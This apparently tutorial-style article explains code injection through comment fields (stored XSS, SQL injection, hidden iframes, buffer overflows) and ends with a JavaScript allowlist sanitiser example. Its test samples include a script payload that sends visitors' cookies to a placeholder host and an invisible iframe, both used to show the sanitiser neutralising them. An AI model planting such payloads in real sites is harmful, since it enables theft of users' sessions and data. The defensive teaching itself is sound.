Code injection

Code injection into a user-accessible text field

This is the biggest risk for the modern social web, because nearly every website has a comment or feedback form where visitors can enter content and post it to your page for other visitors to see. Now, what happens when you type some JavaScript into a comment form on your blog and post it? If the site stores it and echoes it back unescaped, that script runs in the browser of every visitor who views the page (stored cross-site scripting). How about a fragment of an SQL query? If your server splices the input into a query string instead of binding it as a parameter, the fragment runs against your database (SQL injection). How about some rogue PHP code? That only executes if your server ever passes user input to eval or include, but sites do exactly that more often than you would think. And the same payloads do not need a form at all: a URL parameter typed into the address bar reaches your server just like a form field does, so any input that your code reflects into a page or a query is a vector.

Attackers will look for any vector that can be used to sneak a line of executable code into a page your web server serves. Remember, all they need is to get one line through, and they’ve got a foothold. For example, the HTML tag ‘iframe‘ embeds another web page inside the host page. Setting the iframe’s attributes to ‘width=0’ and ‘height=0’ keeps it invisible to your readers. But the iframe’s ‘src’ might point at a web server on the other side of the world hosting a JavaScript attack that steals your users’ session cookies and form data, or tries to install malware on your users’ computers. Note where the damage happens: the injected markup sits in your database and is served by your server, but the code runs in your visitors’ browsers, under your site’s origin and with their credentials. This is just one of the many tricks out there.

To guard against this, make sure every text field on your site is handled with strict content validation, and encode the content again when you render it. The standard practice is an allowlist: deny all HTML except a few attribute-free tags for content markup (bold, italic, paragraph breaks), rather than trying to enumerate the dangerous tags, because attackers know far more dangerous tags and attributes than any denylist will. For database access, the fix for injected SQL is not filtering at all but parameterised queries, so that user text can never become part of the query’s structure. The code on your server which accepts text input from users should also reject any input that goes out of bounds in length. That limit is sometimes described as preventing the ‘buffer overflow’ attack, where innocent text is typed in first, followed by harmful bytes intended to overrun the fixed-size memory the receiving code is using to read the text, and hopefully be executed. Be clear about where that risk actually lives: a buffer overflow is a bug in native code (C or C++) that copies input into a fixed buffer without checking its size. Scripting runtimes such as PHP or JavaScript manage memory for you, so overlong comment text will not overflow your application code, but the web server, its extensions, and libraries such as image decoders are native code, and over-length input does reach them. So keep the input length limits, keep those native components patched, and if you write any C yourself, check the boundaries of every buffer you copy input into.
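The following is an added example, not code from the original article: a minimal allowlist sanitiser for comment text of the kind the paragraphs above describe. The strategy is to escape everything first, so that no raw markup can survive, and then restore only the exact, attribute-free spelling of a handful of allowed tags. Because only those literal strings are ever turned back into markup, an attribute-carrying tag such as the hidden iframe, or an event handler on an otherwise allowed tag, can never reach the page as markup. The tag list, the 2000-character limit, and the sample comments are assumptions made for the example.

```javascript
// Added example (not from the original article): escape-then-allowlist
// sanitiser plus a length bound for user-submitted comments.

const ALLOWED_TAGS = ["b", "i", "em", "strong", "p", "br"]; // assumed site policy
const MAX_COMMENT_LENGTH = 2000;                            // assumed site policy

// Reject out-of-bounds input before doing anything else with it.
function checkLength(input) {
  if (typeof input !== "string") {
    throw new TypeError("comment must be a string");
  }
  if (input.length > MAX_COMMENT_LENGTH) {
    throw new RangeError(`comment exceeds ${MAX_COMMENT_LENGTH} characters`);
  }
  return input;
}

// Escape the five characters that can change meaning in HTML text or
// attribute context. '&' must go first so already-escaped text cannot
// be smuggled through as an entity.
function escapeHtml(text) {
  return text
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Turn back into markup only the exact opening and closing forms of
// allowed tags (e.g. "&lt;b&gt;" -> "<b>"). Anything with attributes,
// whitespace or a different case stays escaped.
function restoreAllowedTags(escaped) {
  let out = escaped;
  for (const tag of ALLOWED_TAGS) {
    out = out
      .split(`&lt;${tag}&gt;`).join(`<${tag}>`)
      .split(`&lt;/${tag}&gt;`).join(`</${tag}>`);
  }
  return out;
}

function sanitizeComment(input) {
  return restoreAllowedTags(escapeHtml(checkLength(input)));
}

// Constructed sample comments: one benign, three hostile.
const SAMPLE_COMMENTS = [
  "I <b>really</b> liked this <br> thanks",
  'Nice post! <iframe width=0 height=0 src="https://example.invalid/x"></iframe>',
  "<script>document.location='https://example.invalid/?c='+document.cookie</script>",
  '<b onmouseover="alert(1)">x</b>',
];

// Returns true only if no raw tag other than an allowed one survives.
function containsOnlyAllowedMarkup(html) {
  const tagPattern = /<\/?([a-zA-Z][a-zA-Z0-9]*)[^>]*>/g;
  let match;
  while ((match = tagPattern.exec(html)) !== null) {
    if (!ALLOWED_TAGS.includes(match[1])) return false;
  }
  return true;
}

for (const comment of SAMPLE_COMMENTS) {
  const safe = sanitizeComment(comment);
  console.log(JSON.stringify(comment), "->", JSON.stringify(safe));
}
```

Run it with Node; the hostile inputs come out with every `<` of the iframe, script and event-handler tags turned into `&lt;`, while the bold and line-break tags survive. This deliberately does not allow `<a href>` or any other attribute: supporting links safely means validating the URL scheme as well, and at that point a maintained sanitiser library is the better choice than extending this by hand.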

Website security is a deep subject, but this article should at least give you a few hints to watch for the most common problems.